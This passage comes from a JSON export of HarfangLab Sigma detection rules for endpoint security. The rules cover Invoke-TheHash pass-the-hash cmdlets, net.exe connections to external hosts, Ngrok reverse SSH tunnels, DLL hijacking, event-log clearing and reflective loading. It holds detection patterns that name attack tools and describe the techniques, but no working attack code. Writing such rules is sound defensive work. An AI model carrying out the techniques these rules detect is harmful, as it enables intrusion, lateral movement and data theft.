[ "attack.execution" ], "rule_technique_tags": [ "attack.t1059.004" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1d290732-2a4c-43db-875e-699d2462cd5d", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.608016Z", "creation_date": "2026-03-23T11:45:34.608020Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.608027Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/Kevin-Robertson/Invoke-TheHash", "https://attack.mitre.org/techniques/T1059/001/", "https://attack.mitre.org/techniques/T1550/002/" ], "name": "t1059_001_powershell_malicious_cmdlet_invoke_thehash.yml", "content": "title: Malicious PowerShell Invoke-TheHash Commandlets Used\nid: 1d290732-2a4c-43db-875e-699d2462cd5d\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the Invoke-TheHash module.\n Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB attacks through the .NET TCPClient.\n Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol.\n It is recommended to check other PowerShell command and the process behavior for suspicious activities.\nreferences:\n - https://github.com/Kevin-Robertson/Invoke-TheHash\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1550/002/\ndate: 2022/10/12\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.lateral_movement\n - attack.t1550.002\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.Invoke-TheHash\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Invoke-WMIExec'\n - 'Invoke-SMBExec'\n - 'Invoke-SMBEnum'\n - 'Invoke-SMBClient'\n - 'Invoke-TheHash'\n\n condition: selection\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1d290732-2a4c-43db-875e-699d2462cd5d", "rule_name": "Malicious PowerShell Invoke-TheHash Commandlets Used", "rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with the Invoke-TheHash module.\nInvoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB attacks through the .NET TCPClient.\nAuthentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol.\nIt is recommended to check other PowerShell command and the process behavior for suspicious activities.\n", "rule_creation_date": "2022-10-12", "rule_modified_date": "2025-04-14", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.execution", "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1059.001", "attack.t1550.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1d329a59-c1ee-4f62-baac-4db01284ac5e", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.083089Z", "creation_date": "2026-03-23T11:45:34.083091Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.083096Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/", "https://attack.mitre.org/techniques/T1570/", "https://attack.mitre.org/techniques/T1048/", "https://attack.mitre.org/software/S0039/" ], "name": "t1570_suspicious_network_connection_net.yml", "content": "title: Suspicious Network Connection by net.exe\nid: 1d329a59-c1ee-4f62-baac-4db01284ac5e\ndescription: |\n Detects suspicious network connections initiated by net.exe to an external IP address.\n Adversaries can mount remote network share to transfer files to and from the targeted system.\n It is recommended to look for any other malicious behavior on the target host, as well as to look for the reputation of the IP address contacted by net.exe.\nreferences:\n - https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/\n - https://attack.mitre.org/techniques/T1570/\n - https://attack.mitre.org/techniques/T1048/\n - https://attack.mitre.org/software/S0039/\ndate: 2023/09/05\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1570\n - attack.exfiltration\n - attack.t1048\n - attack.s0039\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.FileDownload\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n ProcessImage|endswith: '\\net.exe'\n ProcessCommandLine|re:\n - ' \\\\\\\\[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\\\' # IP\n - ' \\\\\\\\\\S+\\.([a-zA-Z]{2,63}|[xX][nN]--[a-zA-Z0-9-]{1,59})\\\\' # Domain\n - ' http(s|)://' # HTTP\n DestinationIsIpv6: 'false'\n\n filter_ip:\n DestinationIp|cidr:\n - '127.0.0.0/8' # RFC1122\n - '192.168.0.0/16' # RFC1918\n - '172.16.0.0/12' # RFC1918\n - '10.0.0.0/8' # RFC1918\n - '169.254.0.0/16' # RFC3927\n - 'fe80::/10'\n - '100.64.0.0/10' # RFC6598\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: moderate", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1d329a59-c1ee-4f62-baac-4db01284ac5e", "rule_name": "Suspicious Network Connection by net.exe", "rule_description": "Detects suspicious network connections initiated by net.exe to an external IP address.\nAdversaries can mount remote network share to transfer files to and from the targeted system.\nIt is recommended to look for any other malicious behavior on the target host, as well as to look for the reputation of the IP address contacted by net.exe.\n", "rule_creation_date": "2023-09-05", "rule_modified_date": "2025-03-07", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.exfiltration", "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1048", "attack.t1570" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1d38f72c-c5fe-4c2b-b710-12190bf78d90", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.612190Z", "creation_date": "2026-03-23T11:45:34.612194Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.612201Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://twitter.com/hakluke/status/1679023050526687244", "https://twitter.com/malmoeb/status/1519710302820089857", "https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel", "https://attack.mitre.org/techniques/T1572/", "https://attack.mitre.org/techniques/T1090/", "https://attack.mitre.org/techniques/T1567/", "https://attack.mitre.org/software/S0508/" ], "name": "t1090_linux_ngrok_ssh.yml", "content": "title: Ngrok Tunnel via SSH (Linux)\nid: 1d38f72c-c5fe-4c2b-b710-12190bf78d90\ndescription: |\n Detects a connection to the official Ngrok Tunnel Server using the SSH command-line tool.\n Ngrok is a tool that allows users to expose their local servers to the internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\n It isn't necessary to download the Ngrok binary to use an Ngrok tunnel, this can be done by creating a reverse SSH tunnel to the Ngrok servers.\n It is recommended to investigate this action to determine its legitimacy.\n If you believe this to be an indicator of malicious activity, it is recommended to investigate which users were compromised and what resources the attacker accessed using this tunnel.\nreferences:\n - https://twitter.com/hakluke/status/1679023050526687244\n - https://twitter.com/malmoeb/status/1519710302820089857\n - https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\n - https://attack.mitre.org/software/S0508/\ndate: 2023/07/13\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - attack.s0508\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Tool.Ngrok\n - classification.Linux.Behavior.Tunneling\n - classification.Linux.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/ssh'\n CommandLine|contains:\n - 'tunnel.??.ngrok.com'\n - 'tunnel.ngrok.com'\n - '.ngrok-agent.com'\n\n condition: selection\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1d38f72c-c5fe-4c2b-b710-12190bf78d90", "rule_name": "Ngrok Tunnel via SSH (Linux)", "rule_description": "Detects a connection to the official Ngrok Tunnel Server using the SSH command-line tool.\nNgrok is a tool that allows users to expose their local servers to the internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\nIt isn't necessary to download the Ngrok binary to use an Ngrok tunnel, this can be done by creating a reverse SSH tunnel to the Ngrok servers.\nIt is recommended to investigate this action to determine its legitimacy.\nIf you believe this to be an indicator of malicious activity, it is recommended to investigate which users were compromised and what resources the attacker accessed using this tunnel.\n", "rule_creation_date": "2023-07-13", "rule_modified_date": "2025-01-09", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.exfiltration" ], "rule_technique_tags": [ "attack.t1090", "attack.t1567", "attack.t1572" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1d3f9140-d12e-4ac2-ae0f-302dc6ba9c21", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.099280Z", "creation_date": "2026-03-23T11:45:34.099282Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.099286Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_synchost.yml", "content": "title: DLL Hijacking via synchost.exe\nid: 1d3f9140-d12e-4ac2-ae0f-302dc6ba9c21\ndescription: |\n Detects potential Windows DLL Hijacking via synchost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'synchost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\policymanager.dll'\n - '\\PROPSYS.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1d3f9140-d12e-4ac2-ae0f-302dc6ba9c21", "rule_name": "DLL Hijacking via synchost.exe", "rule_description": "Detects potential Windows DLL Hijacking via synchost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1d42a517-fd7d-4aa1-bdea-8bb23464d866", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.627863Z", "creation_date": "2026-03-23T11:45:34.627866Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.627886Z", "rule_level": "medium", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1070/001/" ], "name": "t1070_001_clear_windows_application_log_no_process.yml", "content": "title: Windows Application Log Cleared\nid: 1d42a517-fd7d-4aa1-bdea-8bb23464d866\ndescription: |\n Detects when one of the Windows application logs is cleared by an unknown process.\n Windows Event Logs are a record of a computer's alerts and notifications.\n Adversaries may clear Windows Event Logs to hide the activity of an intrusion.\n It is recommended to investigate the process responsible for this action as well as to look for suspicious activities on the host preceding the clearing of the logs.\nreferences:\n - https://attack.mitre.org/techniques/T1070/001/\ndate: 2026/01/15\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n service: system\ndetection:\n selection:\n EventID: 104\n Source: Microsoft-Windows-Eventlog\n\n # This is handled by the rule 43a740ac-2e54-4653-84a7-349b469a0a35\n filter_process:\n ProcessImage|contains: '?'\n\n exclusion_channel:\n Channel:\n - 'ModemAuthenticatorLog'\n - 'Microsoft-Exchange-ManagedAvailability/ThrottlingConfig'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1d42a517-fd7d-4aa1-bdea-8bb23464d866", "rule_name": "Windows Application Log Cleared", "rule_description": "Detects when one of the Windows application logs is cleared by an unknown process.\nWindows Event Logs are a record of a computer's alerts and notifications.\nAdversaries may clear Windows Event Logs to hide the activity of an intrusion.\nIt is recommended to investigate the process responsible for this action as well as to look for suspicious activities on the host preceding the clearing of the logs.\n", "rule_creation_date": "2026-01-15", "rule_modified_date": "2026-02-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1070.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1d5ccdaa-b937-4d62-a941-fc69637a870a", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "low", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.605699Z", "creation_date": "2026-03-23T11:45:34.605702Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.605710Z", "rule_level": "low", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://github.com/redcanaryco/atomic-red-team/blob/09cef802316c0db576963b2742b506a9f274f4ae/atomics/T1614.001/T1614.001.md", "https://attack.mitre.org/techniques/T1614/001/", "https://attack.mitre.org/techniques/T1480/" ], "name": "t1614_001_system_language_discovery_chcp.yml", "content": "title: System Language Discovered via chcp\nid: 1d5ccdaa-b937-4d62-a941-fc69637a870a\ndescription: |\n Detects the identification of the system language using the chcp utility.\n Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.\n It is recommended to analyze the parent process to look for malicious content or other suspicious actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/09cef802316c0db576963b2742b506a9f274f4ae/atomics/T1614.001/T1614.001.md\n - https://attack.mitre.org/techniques/T1614/001/\n - https://attack.mitre.org/techniques/T1480/\ndate: 2022/12/23\nmodified: 2025/10/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1480\n - attack.discovery\n - attack.t1614\n - attack.t1614.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'CHCP.COM'\n CommandLine: 'chcp'\n\n exclusion_programfiles:\n GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_grandparent:\n GrandparentImage:\n - '?\\Users\\\\*\\AppData\\Local\\Ankama\\Retro\\Dofus Retro.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\RingCentral\\RingCentral.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\oz-client\\Poly Lens.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\shadow\\Shadow.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\RealtimeBoard\\\\*\\Miro.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\gitkraken\\app-*\\gitkraken.exe'\n - '?:\\Windows\\Prey\\versions\\\\*\\bin\\node.exe'\n - '*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Blitz\\Blitz.exe'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Sky\\Sky Go\\Sky Go.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\monsisraapp\\MonSisra2.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\monsisra\\MonSisra2.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\MonSisra2\\MonSisra2.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files\\NSClient++\\nscp.exe'\n - '\\UCMDB\\DataFlowProbe\\bin\\jre\\bin\\discovery_probe.exe|'\n - '?:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe'\n - '?:\\Program Files (x86)\\CheckPoint\\Endpoint Connect\\openmail.exe'\n\n exclusion_commandline:\n - ParentCommandLine:\n - '?:\\windows\\system32\\cmd.exe /d /s /c chcp'\n - '?:\\Windows\\System32\\cmd.exe /D /C chcp'\n - 'cmd.exe /x/d/c chcp'\n - 'cmd.exe /d /s /c chcp'\n - GrandparentCommandLine:\n - '?:\\WINDOWS\\system32\\cmd.exe /d /c ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*.bat'\n - '?:\\windows\\system32\\cmd.exe /d /c ?:\\ProgramData\\\\*\\\\*.bat'\n - '?:\\windows\\system32\\cmd.exe /d /c ?:\\windows\\TEMP\\\\*\\\\*.bat'\n - '?:\\Windows\\System32\\cmd.exe /c *\\Bruker\\TopSpin*\\\\*'\n\n exclusion_parsys:\n CurrentDirectory|contains: 'parsys'\n GrandparentImage|endswith: '\\station.exe'\n\n exclusion_smadmin:\n ParentCommandLine|contains: '\\SMadmin\\'\n\n exclusion_anaconda:\n - GrandparentCommandLine|contains: '\\anaconda'\n - Ancestors|contains:\n - '\\anaconda3\\Scripts\\conda.exe|'\n - '\\Anaconda\\Scripts\\conda.exe|'\n - '\\miniconda\\Scripts\\conda.exe|'\n - '\\miniconda3\\Scripts\\conda.exe|'\n\n exclusion_vray:\n CurrentDirectory|contains: '\\V-Ray\\'\n\n exclusion_googlecloud:\n CurrentDirectory|contains: '\\Google\\Cloud SDK\\'\n\n exclusion_autodesk:\n GrandparentImage|endswith: '\\Autodesk Installer.exe'\n\n exclusion_varian:\n GrandparentCommandLine|contains:\n - '?:\\Program Files\\Varian\\'\n - '?:\\Program Files (x86)\\Varian\\'\n\n exclusion_unity:\n CurrentDirectory|startswith:\n - '?:\\Program Files\\Unity\\Hub\\Editor\\'\n - '?:\\Program Files (x86)\\Unity\\Hub\\Editor\\'\n\n exclusion_postgres:\n GrandparentCommandLine: '?:\\windows\\system32\\cmd.exe /c ?:\\Program Files\\PostgreSQL\\\\??\\scripts\\runpsql.bat'\n\n exclusion_discord:\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /d /s /c chcp'\n GrandparentCommandLine:\n - '*\\Discord\\app-*\\Discord.exe'\n # Discord.exe --overlay-host\n - '*\\Discord\\app-*\\Discord.exe *'\n\n exclusion_node:\n - ProcessGrandparentOriginalFileName: 'node.exe'\n - Ancestors|contains: '|?:\\Program Files\\nodejs\\node.exe|'\n\n exclusion_schedule:\n - GrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessParentGrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1d5ccdaa-b937-4d62-a941-fc69637a870a", "rule_name": "System Language Discovered via chcp", "rule_description": "Detects the identification of the system language using the chcp utility.\nAdversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.\nIt is recommended to analyze the parent process to look for malicious content or other suspicious actions.\n", "rule_creation_date": "2022-12-23", "rule_modified_date": "2025-10-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.discovery" ], "rule_technique_tags": [ "attack.t1480", "attack.t1614", "attack.t1614.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1d9e6035-5064-4ba3-8bf6-1759b2641f54", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.598091Z", "creation_date": "2026-03-23T11:45:34.598097Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.598110Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://slyd0g.medium.com/understanding-and-defending-against-reflective-code-loading-on-macos-e2e83211e48f", "https://attack.mitre.org/techniques/T1620/" ], "name": "t1620_reflective_loading_file.yml", "content": "title: Suspicious Executable Reflective Loading File Created\nid: 1d9e6035-5064-4ba3-8bf6-1759b2641f54\ndescription: |\n Detects the creation of a specific file related to reflective binary execution on macOS.\n Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads.\n It is recommended to check for malicious activities by the process creating the file.\nreferences:\n - https://slyd0g.medium.com/understanding-and-defending-against-reflective-code-loading-on-macos-e2e83211e48f\n - https://attack.mitre.org/techniques/T1620/\ndate: 2024/04/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.MemoryExecution\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection:\n Path|contains: '/NSCreateObjectFileImageFromMemory-'\n Kind: 'create'\n ProcessImage|contains: '?'\n\n exclusion_common_folders:\n ProcessImage|startswith:\n - '/System/Library/'\n - '/Library/Application Support/'\n - '/library/frameworks/'\n - '/Applications/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1d9e6035-5064-4ba3-8bf6-1759b2641f54", "rule_name": "Suspicious Executable Reflective Loading File Created", "rule_description": "Detects the creation of a specific file related to reflective binary execution on macOS.\nAdversaries may reflectively load code into a process in order to conceal the execution of malicious payloads.\nIt is recommended to check for malicious activities by the process creating the file.\n", "rule_creation_date": "2024-04-03", "rule_modified_date": "2025-10-29", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1620" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1dff2e4d-9edd-4b48-af83-6c559ea3e9c5", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.075932Z", "creation_date": "2026-03-23T11:45:34.075934Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.075938Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://pentestlab.blog/2020/01/07/persistence-appinit-dlls/", "https://attack.mitre.org/techniques/T1546/010/" ], "name": "t1546_010_persistence_registry_appinit_dlls.yml", "content": "title: Registry AppInit DLLs Modified\nid: 1dff2e4d-9edd-4b48-af83-6c559ea3e9c5\ndescription: |\n Detects the modification of the AppInit_DLLs or 